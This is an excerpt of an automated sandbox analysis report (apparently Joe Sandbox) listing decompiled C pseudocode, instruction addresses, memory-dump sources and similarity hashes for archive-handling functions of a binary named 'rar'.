				if ( *(_t830 + 0x347c) == (E00007FF67FF650B48B90(r8d >> 0x00000002 & r13b, 0, _t842 + 0x60) & 0x0000ffff)) goto 0x50b1dba6;
				_t490 =  *(_t830 + 0x3480);
				if (_t490 == 0x79) goto 0x50b1dba6;
				if (_t490 == 0x76) goto 0x50b1dba6;
				if (_t490 != 5) goto 0x50b1db6c;
				if ( *(_t830 + 0x585e) == r12b) goto 0x50b1db6c;
				 *0x50b80550();
				r8d = 0;
				 *0x50b80550();
				_t493 = E00007FF67FF650B32138(_t830);
				_t508 =  !=  ? r12d : r13b & 0x000000ff;
				if (_t493 != 0) goto 0x50b1db52;
				_t671 =  !=  ? r12d : r13b & 0x000000ff;
				if (( !=  ? r12d : r13b & 0x000000ff) != 0) goto 0x50b1dba6;
				 *(_t830 + 0x7f90) = r13b;
				E00007FF67FF650B2CC24(_t493, 3,  !=  ? r12d : r13b & 0x000000ff, 0x50ba7ab8);
				if (r14b == 0) goto 0x50b1dba6;
				E00007FF67FF650B112C8(4, _t830 + 0x3a, _t830 + 0x3a);
				 *(_t830 + 0x7f91) = r13b;
				goto 0x50b1ce35;
				return E00007FF67FF650B69D10(E00007FF67FF650B11534(_t842 + 0x60), 4,  *(_t839 + 0x2000) ^ _t842);
			}













































































                                                                                                            0x7ff650b1cd84
                                                                                                            0x7ff650b1cd84
                                                                                                            0x7ff650b1cd84
                                                                                                            0x7ff650b1cd87
                                                                                                            0x7ff650b1cd8b
                                                                                                            0x7ff650b1cd8f
                                                                                                            0x7ff650b1cd9c
                                                                                                            0x7ff650b1cda8
                                                                                                            0x7ff650b1cdad
                                                                                                            0x7ff650b1cdb0
                                                                                                            0x7ff650b1cdba
                                                                                                            0x7ff650b1cdc1
                                                                                                            0x7ff650b1cdcc
                                                                                                            0x7ff650b1cdd7
                                                                                                            0x7ff650b1cdd7
                                                                                                            0x7ff650b1cddb
                                                                                                            0x7ff650b1cde5
                                                                                                            0x7ff650b1cdfc
                                                                                                            0x7ff650b1ce02
                                                                                                            0x7ff650b1ce0a
                                                                                                            0x7ff650b1ce12
                                                                                                            0x7ff650b1ce12
                                                                                                            0x7ff650b1ce16
                                                                                                            0x7ff650b1ce2a
                                                                                                            0x7ff650b1ce2f
                                                                                                            0x7ff650b1ce3a
                                                                                                            0x7ff650b1ce41
                                                                                                            0x7ff650b1ce46
                                                                                                            0x7ff650b1ce5b
                                                                                                            0x7ff650b1ce60
                                                                                                            0x7ff650b1ce65
                                                                                                            0x7ff650b1ce6a
                                                                                                            0x7ff650b1ce6f
                                                                                                            0x7ff650b1ce73
                                                                                                            0x7ff650b1ce7a
                                                                                                            0x7ff650b1ce7a
                                                                                                            0x7ff650b1ce81
                                                                                                            0x7ff650b1ce86
                                                                                                            0x7ff650b1ce8a
                                                                                                            0x7ff650b1ce8c
                                                                                                            0x7ff650b1ce99
                                                                                                            0x7ff650b1cea2
                                                                                                            0x7ff650b1ceb1
                                                                                                            0x7ff650b1ceb7
                                                                                                            0x7ff650b1cec8
                                                                                                            0x7ff650b1ced5
                                                                                                            0x7ff650b1ced8
                                                                                                            0x7ff650b1cee4
                                                                                                            0x7ff650b1cef4
                                                                                                            0x7ff650b1cef7
                                                                                                            0x7ff650b1cefd
                                                                                                            0x7ff650b1cf03
                                                                                                            0x7ff650b1cf05
                                                                                                            0x7ff650b1cf0a
                                                                                                            0x7ff650b1cf0f
                                                                                                            0x7ff650b1cf1b
                                                                                                            0x7ff650b1cf1b
                                                                                                            0x7ff650b1cf1f
                                                                                                            0x7ff650b1cf1f
                                                                                                            0x7ff650b1cf23
                                                                                                            0x7ff650b1cf23
                                                                                                            0x7ff650b1cf2a
                                                                                                            0x7ff650b1cf2f
                                                                                                            0x7ff650b1cf33
                                                                                                            0x7ff650b1cf38
                                                                                                            0x7ff650b1cf3a
                                                                                                            0x7ff650b1cf44
                                                                                                            0x7ff650b1cf46
                                                                                                            0x7ff650b1cf50
                                                                                                            0x7ff650b1cf52
                                                                                                            0x7ff650b1cf5c
                                                                                                            0x7ff650b1cf5e
                                                                                                            0x7ff650b1cf65
                                                                                                            0x7ff650b1cf68
                                                                                                            0x7ff650b1cf71
                                                                                                            0x7ff650b1cf76
                                                                                                            0x7ff650b1cf78
                                                                                                            0x7ff650b1cf7f
                                                                                                            0x7ff650b1cf84
                                                                                                            0x7ff650b1cf8e
                                                                                                            0x7ff650b1cf99
                                                                                                            0x7ff650b1cf9c
                                                                                                            0x7ff650b1cfaa
                                                                                                            0x7ff650b1cfb1
                                                                                                            0x7ff650b1cfb8
                                                                                                            0x7ff650b1cfc2
                                                                                                            0x7ff650b1cfcb
                                                                                                            0x7ff650b1cfd4
                                                                                                            0x7ff650b1cfdd
                                                                                                            0x7ff650b1cfe6
                                                                                                            0x7ff650b1cfef
                                                                                                            0x7ff650b1cff8
                                                                                                            0x7ff650b1cffa
                                                                                                            0x7ff650b1d004
                                                                                                            0x7ff650b1d00f
                                                                                                            0x7ff650b1d016
                                                                                                            0x7ff650b1d01d
                                                                                                            0x7ff650b1d022
                                                                                                            0x7ff650b1d029
                                                                                                            0x7ff650b1d036
                                                                                                            0x7ff650b1d046
                                                                                                            0x7ff650b1d056
                                                                                                            0x7ff650b1d066
                                                                                                            0x7ff650b1d077
                                                                                                            0x7ff650b1d084
                                                                                                            0x7ff650b1d08f
                                                                                                            0x7ff650b1d09a
                                                                                                            0x7ff650b1d09f
                                                                                                            0x7ff650b1d0a6
                                                                                                            0x7ff650b1d0b3
                                                                                                            0x7ff650b1d0c5
                                                                                                            0x7ff650b1d0cb
                                                                                                            0x7ff650b1d0dc
                                                                                                            0x7ff650b1d0ed
                                                                                                            0x7ff650b1d100
                                                                                                            0x7ff650b1d109
                                                                                                            0x7ff650b1d112
                                                                                                            0x7ff650b1d118
                                                                                                            0x7ff650b1d11f
                                                                                                            0x7ff650b1d126
                                                                                                            0x7ff650b1d12e
                                                                                                            0x7ff650b1d13c
                                                                                                            0x7ff650b1d14c
                                                                                                            0x7ff650b1d15c
                                                                                                            0x7ff650b1d16c
                                                                                                            0x7ff650b1d17c
                                                                                                            0x7ff650b1d182
                                                                                                            0x7ff650b1d187
                                                                                                            0x7ff650b1d18c
                                                                                                            0x7ff650b1d19b
                                                                                                            0x7ff650b1d19d
                                                                                                            0x7ff650b1d19d
                                                                                                            0x7ff650b1d1a0
                                                                                                            0x7ff650b1d1a7
                                                                                                            0x7ff650b1d1ab
                                                                                                            0x7ff650b1d1b7
                                                                                                            0x7ff650b1d1c3
                                                                                                            0x7ff650b1d1cb
                                                                                                            0x7ff650b1d1d0
                                                                                                            0x7ff650b1d1d7
                                                                                                            0x7ff650b1d1de
                                                                                                            0x7ff650b1d1e6
                                                                                                            0x7ff650b1d1f4
                                                                                                            0x7ff650b1d204
                                                                                                            0x7ff650b1d214
                                                                                                            0x7ff650b1d224
                                                                                                            0x7ff650b1d234
                                                                                                            0x7ff650b1d23a
                                                                                                            0x7ff650b1d23f
                                                                                                            0x7ff650b1d246
                                                                                                            0x7ff650b1d24d
                                                                                                            0x7ff650b1d255
                                                                                                            0x7ff650b1d263
                                                                                                            0x7ff650b1d273
                                                                                                            0x7ff650b1d27f
                                                                                                            0x7ff650b1d284
                                                                                                            0x7ff650b1d297
                                                                                                            0x7ff650b1d297
                                                                                                            0x7ff650b1d29f
                                                                                                            0x7ff650b1d2a1
                                                                                                            0x7ff650b1d2ae
                                                                                                            0x7ff650b1d2b0
                                                                                                            0x7ff650b1d2b7
                                                                                                            0x7ff650b1d2c7
                                                                                                            0x7ff650b1d2cc
                                                                                                            0x7ff650b1d2e0
                                                                                                            0x7ff650b1d2ec
                                                                                                            0x7ff650b1d2fb
                                                                                                            0x7ff650b1d303
                                                                                                            0x7ff650b1d308
                                                                                                            0x7ff650b1d30f
                                                                                                            0x7ff650b1d31c
                                                                                                            0x7ff650b1d32c
                                                                                                            0x7ff650b1d33d
                                                                                                            0x7ff650b1d34d
                                                                                                            0x7ff650b1d35d
                                                                                                            0x7ff650b1d364
                                                                                                            0x7ff650b1d369
                                                                                                            0x7ff650b1d370
                                                                                                            0x7ff650b1d37d
                                                                                                            0x7ff650b1d38c
                                                                                                            0x7ff650b1d392
                                                                                                            0x7ff650b1d39c
                                                                                                            0x7ff650b1d39f
                                                                                                            0x7ff650b1d3ad
                                                                                                            0x7ff650b1d3b9
                                                                                                            0x7ff650b1d3c1
                                                                                                            0x7ff650b1d3cd
                                                                                                            0x7ff650b1d3da
                                                                                                            0x7ff650b1d3ea
                                                                                                            0x7ff650b1d3ed
                                                                                                            0x7ff650b1d3f3
                                                                                                            0x7ff650b1d3f9
                                                                                                            0x7ff650b1d40b
                                                                                                            0x7ff650b1d40e
                                                                                                            0x7ff650b1d416
                                                                                                            0x7ff650b1d41b
                                                                                                            0x7ff650b1d422
                                                                                                            0x7ff650b1d42b
                                                                                                            0x7ff650b1d434
                                                                                                            0x7ff650b1d43a
                                                                                                            0x7ff650b1d444
                                                                                                            0x7ff650b1d452
                                                                                                            0x7ff650b1d460
                                                                                                            0x7ff650b1d468
                                                                                                            0x7ff650b1d46e
                                                                                                            0x7ff650b1d475
                                                                                                            0x7ff650b1d47a
                                                                                                            0x7ff650b1d483
                                                                                                            0x7ff650b1d48a
                                                                                                            0x7ff650b1d48c
                                                                                                            0x7ff650b1d48f
                                                                                                            0x7ff650b1d497
                                                                                                            0x7ff650b1d4a0
                                                                                                            0x7ff650b1d4a6
                                                                                                            0x7ff650b1d4ac
                                                                                                            0x7ff650b1d4ae
                                                                                                            0x7ff650b1d4b1
                                                                                                            0x7ff650b1d4ba
                                                                                                            0x7ff650b1d4c0
                                                                                                            0x7ff650b1d4c3
                                                                                                            0x7ff650b1d4c6
                                                                                                            0x7ff650b1d4d5
                                                                                                            0x7ff650b1d4e1
                                                                                                            0x7ff650b1d4f1
                                                                                                            0x7ff650b1d4fe
                                                                                                            0x7ff650b1d50b
                                                                                                            0x7ff650b1d513
                                                                                                            0x7ff650b1d523
                                                                                                            0x7ff650b1d533
                                                                                                            0x7ff650b1d543
                                                                                                            0x7ff650b1d552
                                                                                                            0x7ff650b1d55f
                                                                                                            0x7ff650b1d568
                                                                                                            0x7ff650b1d56d
                                                                                                            0x7ff650b1d56f
                                                                                                            0x7ff650b1d572
                                                                                                            0x7ff650b1d578
                                                                                                            0x7ff650b1d57d
                                                                                                            0x7ff650b1d57f
                                                                                                            0x7ff650b1d586
                                                                                                            0x7ff650b1d589
                                                                                                            0x7ff650b1d597
                                                                                                            0x7ff650b1d59c
                                                                                                            0x7ff650b1d5a1
                                                                                                            0x7ff650b1d5a6
                                                                                                            0x7ff650b1d5ab
                                                                                                            0x7ff650b1d5ad
                                                                                                            0x7ff650b1d5b7
                                                                                                            0x7ff650b1d5b9
                                                                                                            0x7ff650b1d5c3
                                                                                                            0x7ff650b1d5c5
                                                                                                            0x7ff650b1d5cb
                                                                                                            0x7ff650b1d5cd
                                                                                                            0x7ff650b1d5d7
                                                                                                            0x7ff650b1d5e4
                                                                                                            0x7ff650b1d5ea
                                                                                                            0x7ff650b1d5ec
                                                                                                            0x7ff650b1d5f3
                                                                                                            0x7ff650b1d5f5
                                                                                                            0x7ff650b1d5ff
                                                                                                            0x7ff650b1d60a
                                                                                                            0x7ff650b1d618
                                                                                                            0x7ff650b1d61a
                                                                                                            0x7ff650b1d624
                                                                                                            0x7ff650b1d62f
                                                                                                            0x7ff650b1d631
                                                                                                            0x7ff650b1d637
                                                                                                            0x7ff650b1d63c
                                                                                                            0x7ff650b1d64a
                                                                                                            0x7ff650b1d650
                                                                                                            0x7ff650b1d657
                                                                                                            0x7ff650b1d65e
                                                                                                            0x7ff650b1d663
                                                                                                            0x7ff650b1d668
                                                                                                            0x7ff650b1d66b
                                                                                                            0x7ff650b1d671
                                                                                                            0x7ff650b1d675
                                                                                                            0x7ff650b1d679
                                                                                                            0x7ff650b1d67b
                                                                                                            0x7ff650b1d681
                                                                                                            0x7ff650b1d683
                                                                                                            0x7ff650b1d692
                                                                                                            0x7ff650b1d6a4
                                                                                                            0x7ff650b1d6c1
                                                                                                            0x7ff650b1d6c5
                                                                                                            0x7ff650b1d6d4
                                                                                                            0x7ff650b1d6e4
                                                                                                            0x7ff650b1d6f0
                                                                                                            0x7ff650b1d6f6
                                                                                                            0x7ff650b1d6fb
                                                                                                            0x7ff650b1d6fb
                                                                                                            0x7ff650b1d703
                                                                                                            0x7ff650b1d709
                                                                                                            0x7ff650b1d70c
                                                                                                            0x7ff650b1d710
                                                                                                            0x7ff650b1d71d
                                                                                                            0x7ff650b1d71f
                                                                                                            0x7ff650b1d723
                                                                                                            0x7ff650b1d730
                                                                                                            0x7ff650b1d737
                                                                                                            0x7ff650b1d739
                                                                                                            0x7ff650b1d73f
                                                                                                            0x7ff650b1d744
                                                                                                            0x7ff650b1d74e
                                                                                                            0x7ff650b1d753
                                                                                                            0x7ff650b1d758
                                                                                                            0x7ff650b1d768
                                                                                                            0x7ff650b1d771
                                                                                                            0x7ff650b1d773
                                                                                                            0x7ff650b1d783
                                                                                                            0x7ff650b1d78e
                                                                                                            0x7ff650b1d799
                                                                                                            0x7ff650b1d79e
                                                                                                            0x7ff650b1d7a1
                                                                                                            0x7ff650b1d7a6
                                                                                                            0x7ff650b1d7b3
                                                                                                            0x7ff650b1d7cb
                                                                                                            0x7ff650b1d7ce
                                                                                                            0x7ff650b1d7d3
                                                                                                            0x7ff650b1d7d5
                                                                                                            0x7ff650b1d7d8
                                                                                                            0x7ff650b1d7d8
                                                                                                            0x7ff650b1d7e3
                                                                                                            0x7ff650b1d7ef
                                                                                                            0x7ff650b1d7f4
                                                                                                            0x7ff650b1d7f6
                                                                                                            0x7ff650b1d805
                                                                                                            0x7ff650b1d80a
                                                                                                            0x7ff650b1d81e
                                                                                                            0x7ff650b1d820
                                                                                                            0x7ff650b1d82e
                                                                                                            0x7ff650b1d830
                                                                                                            0x7ff650b1d837
                                                                                                            0x7ff650b1d842
                                                                                                            0x7ff650b1d851
                                                                                                            0x7ff650b1d85d
                                                                                                            0x7ff650b1d868
                                                                                                            0x7ff650b1d874
                                                                                                            0x7ff650b1d87f
                                                                                                            0x7ff650b1d88a
                                                                                                            0x7ff650b1d88e
                                                                                                            0x7ff650b1d892
                                                                                                            0x7ff650b1d895
                                                                                                            0x7ff650b1d899
                                                                                                            0x7ff650b1d8b1
                                                                                                            0x7ff650b1d8bb
                                                                                                            0x7ff650b1d8c4
                                                                                                            0x7ff650b1d8e3
                                                                                                            0x7ff650b1d8e8
                                                                                                            0x7ff650b1d8ec
                                                                                                            0x7ff650b1d8ee
                                                                                                            0x7ff650b1d8f4
                                                                                                            0x7ff650b1d8fa
                                                                                                            0x7ff650b1d8fc
                                                                                                            0x7ff650b1d902
                                                                                                            0x7ff650b1d905
                                                                                                            0x7ff650b1d91e
                                                                                                            0x7ff650b1d920
                                                                                                            0x7ff650b1d923
                                                                                                            0x7ff650b1d92b
                                                                                                            0x7ff650b1d92d
                                                                                                            0x7ff650b1d933
                                                                                                            0x7ff650b1d93e
                                                                                                            0x7ff650b1d943
                                                                                                            0x7ff650b1d946
                                                                                                            0x7ff650b1d94e
                                                                                                            0x7ff650b1d954
                                                                                                            0x7ff650b1d95c
                                                                                                            0x7ff650b1d964
                                                                                                            0x7ff650b1d969
                                                                                                            0x7ff650b1d970
                                                                                                            0x7ff650b1d977
                                                                                                            0x7ff650b1d97d
                                                                                                            0x7ff650b1d982
                                                                                                            0x7ff650b1d998
                                                                                                            0x7ff650b1d99d
                                                                                                            0x7ff650b1d9af
                                                                                                            0x7ff650b1d9b7
                                                                                                            0x7ff650b1d9bf
                                                                                                            0x7ff650b1d9c5
                                                                                                            0x7ff650b1d9d6
                                                                                                            0x7ff650b1d9db
                                                                                                            0x7ff650b1d9e3
                                                                                                            0x7ff650b1d9ec
                                                                                                            0x7ff650b1d9f0
                                                                                                            0x7ff650b1d9fa
                                                                                                            0x7ff650b1d9ff
                                                                                                            0x7ff650b1da09
                                                                                                            0x7ff650b1da0e
                                                                                                            0x7ff650b1da15
                                                                                                            0x7ff650b1da1e
                                                                                                            0x7ff650b1da2b
                                                                                                            0x7ff650b1da37
                                                                                                            0x7ff650b1da3e
                                                                                                            0x7ff650b1da4d
                                                                                                            0x7ff650b1da53
                                                                                                            0x7ff650b1da63
                                                                                                            0x7ff650b1da72
                                                                                                            0x7ff650b1da81
                                                                                                            0x7ff650b1da90
                                                                                                            0x7ff650b1da98
                                                                                                            0x7ff650b1daa5
                                                                                                            0x7ff650b1daaa
                                                                                                            0x7ff650b1dab8
                                                                                                            0x7ff650b1dac7
                                                                                                            0x7ff650b1dacd
                                                                                                            0x7ff650b1dad1
                                                                                                            0x7ff650b1dad4
                                                                                                            0x7ff650b1dadb
                                                                                                            0x7ff650b1dae2
                                                                                                            0x7ff650b1dafc
                                                                                                            0x7ff650b1db02
                                                                                                            0x7ff650b1db0b
                                                                                                            0x7ff650b1db14
                                                                                                            0x7ff650b1db1d
                                                                                                            0x7ff650b1db26
                                                                                                            0x7ff650b1db32
                                                                                                            0x7ff650b1db43
                                                                                                            0x7ff650b1db49
                                                                                                            0x7ff650b1db55
                                                                                                            0x7ff650b1db5f
                                                                                                            0x7ff650b1db66
                                                                                                            0x7ff650b1db68
                                                                                                            0x7ff650b1db6a
                                                                                                            0x7ff650b1db6c
                                                                                                            0x7ff650b1db7f
                                                                                                            0x7ff650b1db87
                                                                                                            0x7ff650b1db95
                                                                                                            0x7ff650b1db9a
                                                                                                            0x7ff650b1dba1
                                                                                                            0x7ff650b1dbe6

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: CMT$u
                                                                                                            • API String ID: 0-171816733
                                                                                                            • Opcode ID: 93bdcc8edd42e019797bcf5026f85761236f3cae1efa67df5126923498e21a69
                                                                                                            • Instruction ID: 33fd872bf07fd5f5e779d7bb5fe0d240e0c72723321541d6339b0415b1711e05
                                                                                                            • Opcode Fuzzy Hash: 93bdcc8edd42e019797bcf5026f85761236f3cae1efa67df5126923498e21a69
                                                                                                            • Instruction Fuzzy Hash: 2482BC22A08AC3A6E7099B34C5801FDA7A1FB56744F484136DB9EA7786DF39F664C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7E078 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 15204871-0
                                                                                                            • Opcode ID: 2c96c8b3905790b2e822488a991f0280a82789752e99e94ad001ab1bb328a92b
                                                                                                            • Instruction ID: 5658993715a4bd7dffd3f6d155660a7e80284947996a31838d727505d85b0043
                                                                                                            • Opcode Fuzzy Hash: 2c96c8b3905790b2e822488a991f0280a82789752e99e94ad001ab1bb328a92b
                                                                                                            • Instruction Fuzzy Hash: 3BB13073604B868BE719CF29C88636C77A0FB49B48F198925DB6E977A4CF3AD451C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B18361 Relevance: 2.7, Strings: 2, Instructions: 196COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 24%
                                                                                                            			E00007FF67FF650B18361(void* __rbx, intOrPtr* __rdi, intOrPtr* __rsi, void* __r9, long long __r14, signed long long _a32, char _a48, signed int _a4208) {
				char _t81;
				void* _t92;
				void* _t99;
				long long _t127;
				intOrPtr _t131;
				void* _t146;
				intOrPtr _t150;
				signed long long _t162;
				signed long long _t163;
				void* _t185;
				intOrPtr* _t191;
				void* _t193;
				signed long long _t195;
				signed long long _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t202 = __r9;
				_t191 = __rsi;
				_t146 = __rbx;
				 *((intOrPtr*)(__rdi + 0x7f78)) =  *((intOrPtr*)(__rsi + 0x7f78));
				if (bpl == 0) goto 0x50b1841f;
				if ( *((intOrPtr*)(__rdi + 0x7f88)) != __r14) goto 0x50b1841f;
				_t127 =  *((intOrPtr*)(__rdi + 0x22d8));
				if ( *((intOrPtr*)(_t127 + 0x1018)) == r14w) goto 0x50b183e1;
				E00007FF67FF650B31C28( &_a48);
				E00007FF67FF650B32864();
				E00007FF67FF650B31D58(_t127, __rbx,  &_a48, __rdi, _t193, 0x7fffffff);
				 *((long long*)(__rdi + 0x7f88)) = _t127;
				E00007FF67FF650B31C70( &_a48);
				goto 0x50b1841f;
				if ( *((intOrPtr*)(__rsi + 0x7f88)) - __r14 <= 0) goto 0x50b1841f;
				r8d = 0;
				 *0x50b80550();
				E00007FF67FF650B31D58( *((intOrPtr*)( *__rsi + 0x20)), _t146, __rsi, __rdi, _t193,  *((intOrPtr*)(__rsi + 0x7f88)));
				 *((long long*)(__rdi + 0x7f88)) =  *((intOrPtr*)(__rsi + 0x7f88));
				if ( *((intOrPtr*)(__rsi + 0x7f84)) == r14b) goto 0x50b1843e;
				 *((char*)(__rdi + 0x7f84)) = 1;
				asm("movups xmm0, [esi+0x34fc]");
				asm("movdqu [edi+0x7f92], xmm0");
				 *((char*)(__rdi + 0x7f7d)) =  *((intOrPtr*)(__rsi + 0x7f7d));
				 *((char*)(__rdi + 0x7f81)) =  *((intOrPtr*)(__rsi + 0x7f81));
				 *((intOrPtr*)(__rdi + 0x7fa4)) =  *((intOrPtr*)(__rsi + 0x7fa4));
				 *((char*)(__rdi + 0x7f82)) =  *((intOrPtr*)(__rsi + 0x7f82));
				if ( *((intOrPtr*)(__rdi + 0x7f7c)) != r14b) goto 0x50b18483;
				if ( *((intOrPtr*)(__rsi + 0x7f7c)) == r14b) goto 0x50b18485;
				 *((char*)(__rdi + 0x7f7c)) = 1;
				 *(__rdi + 0x7f80) = r14b;
				 *(__rdi + 0x7f83) = r14b;
				_t131 =  *((intOrPtr*)(__rdi + 0x22d8));
				if ( *((intOrPtr*)(_t131 + 0x7438)) == r14b) goto 0x50b184b7;
				 *((char*)(__rdi + 0x7f7f)) = 1;
				if ( *((intOrPtr*)(__rdi + 0x7f78)) != 3) goto 0x50b184d6;
				if ( *((intOrPtr*)(_t131 + 0x2018)) != r14d) goto 0x50b184d2;
				if ( *((intOrPtr*)(_t131 + 0x714c)) == r14d) goto 0x50b184d6;
				goto 0x50b184d9;
				_t81 = r14b;
				 *((char*)(__rdi + 0x34be)) = _t81;
				 *((long long*)(__rdi + 0x34c0)) = __r14;
				 *((long long*)(__rdi + 0x34d0)) = __r14;
				if (_t81 == 0) goto 0x50b18576;
				if ( *0x50b80550() == 0) goto 0x50b18516;
				E00007FF67FF650B320B8(_t146, __rsi, __rsi);
				goto 0x50b18519;
				_t162 = __r14 +  *((intOrPtr*)(__rdi + 0x7fb8)) +  *((intOrPtr*)(__rdi + 0x7fb0));
				if (_t162 - 0x10000000 >= 0) goto 0x50b18545;
				_t201 = _t162 + 1 << 0xc;
				asm("dec eax");
				_t163 = _t162 & _t201;
				 *(__rdi + 0x34c8) = _t163;
				asm("dec eax");
				 *(__rdi + 0x34d8) = _t163 & _t201;
				r8d = 0;
				 *0x50b80550();
				_a32 = r14b;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B1B4D8(0,  *((intOrPtr*)( *__rdi + 0x20)), __rdi,  *((intOrPtr*)(__rdi + 0x7f88)), _t201, _t203, _t204);
				if ( *((intOrPtr*)(__rdi + 0x7f84)) == r14b) goto 0x50b185ce;
				if ( *((intOrPtr*)(__rdi + 0x7f78)) != 3) goto 0x50b185ce;
				_a32 = r14b;
				r9d = 0;
				r8d = 0;
				_t57 = _t202 + 4; // 0x4
				E00007FF67FF650B1B4D8(_t57,  *((intOrPtr*)( *__rdi + 0x20)), __rdi,  *((intOrPtr*)(__rdi + 0x7f88)), _t201, _t203, _t204);
				_a32 = r14b;
				r9d = 0;
				r8d = 0;
				_t59 = _t202 + 1; // 0x1
				E00007FF67FF650B1B4D8(_t59,  *((intOrPtr*)( *__rdi + 0x20)), __rdi,  *((intOrPtr*)(__rdi + 0x7f88)), _t201, _t203, _t204);
				if (_t146 != 0) goto 0x50b18607;
				_t92 =  *0x50b80550();
				_t148 =  !=  ? _t191 : __rdi;
				_t149 = ( !=  ? _t191 : __rdi) + 0x3a;
				if (( *(_t131 + 0x301e) & 0x0000ffff) == 0) goto 0x50b1861e;
				_t185 = ( !=  ? _t191 : __rdi) + 0x3a;
				0x50b178c8();
				bpl = 1;
				if (_t92 != 0) goto 0x50b18621;
				bpl = r14b;
				if ( *0x50b80550() == 0) goto 0x50b18693;
				_t150 =  *_t191;
				E00007FF67FF650B1C330( *((intOrPtr*)( *_t191 + 0x30)), _t150, _t191);
				r8d = 0;
				 *0x50b80550();
				bpl =  ~bpl;
				asm("dec eax");
				_a32 =  *(_t150 + 0x20) & L"CMT";
				r9d = 0;
				r8b = 1;
				E00007FF67FF650B195E0(_t150, __rdi, _t191, __rdi, _t191, _t202);
				r8d = 0;
				return E00007FF67FF650B69D10( *0x50b80550(), _t99, _a4208 ^ _t195);
			}




















                                                                                                            0x7ff650b18361
                                                                                                            0x7ff650b18361
                                                                                                            0x7ff650b18361
                                                                                                            0x7ff650b18367
                                                                                                            0x7ff650b18370
                                                                                                            0x7ff650b1837d
                                                                                                            0x7ff650b18383
                                                                                                            0x7ff650b18392
                                                                                                            0x7ff650b18399
                                                                                                            0x7ff650b183b2
                                                                                                            0x7ff650b183c9
                                                                                                            0x7ff650b183ce
                                                                                                            0x7ff650b183da
                                                                                                            0x7ff650b183df
                                                                                                            0x7ff650b183e8
                                                                                                            0x7ff650b183ed
                                                                                                            0x7ff650b183f9
                                                                                                            0x7ff650b1840c
                                                                                                            0x7ff650b18418
                                                                                                            0x7ff650b18426
                                                                                                            0x7ff650b18428
                                                                                                            0x7ff650b1842f
                                                                                                            0x7ff650b18436
                                                                                                            0x7ff650b18444
                                                                                                            0x7ff650b18450
                                                                                                            0x7ff650b1845c
                                                                                                            0x7ff650b18468
                                                                                                            0x7ff650b18475
                                                                                                            0x7ff650b18481
                                                                                                            0x7ff650b18485
                                                                                                            0x7ff650b1848b
                                                                                                            0x7ff650b18492
                                                                                                            0x7ff650b18499
                                                                                                            0x7ff650b184ae
                                                                                                            0x7ff650b184b0
                                                                                                            0x7ff650b184be
                                                                                                            0x7ff650b184c7
                                                                                                            0x7ff650b184d0
                                                                                                            0x7ff650b184d4
                                                                                                            0x7ff650b184d6
                                                                                                            0x7ff650b184d9
                                                                                                            0x7ff650b184df
                                                                                                            0x7ff650b184e6
                                                                                                            0x7ff650b184ef
                                                                                                            0x7ff650b18507
                                                                                                            0x7ff650b1850c
                                                                                                            0x7ff650b18514
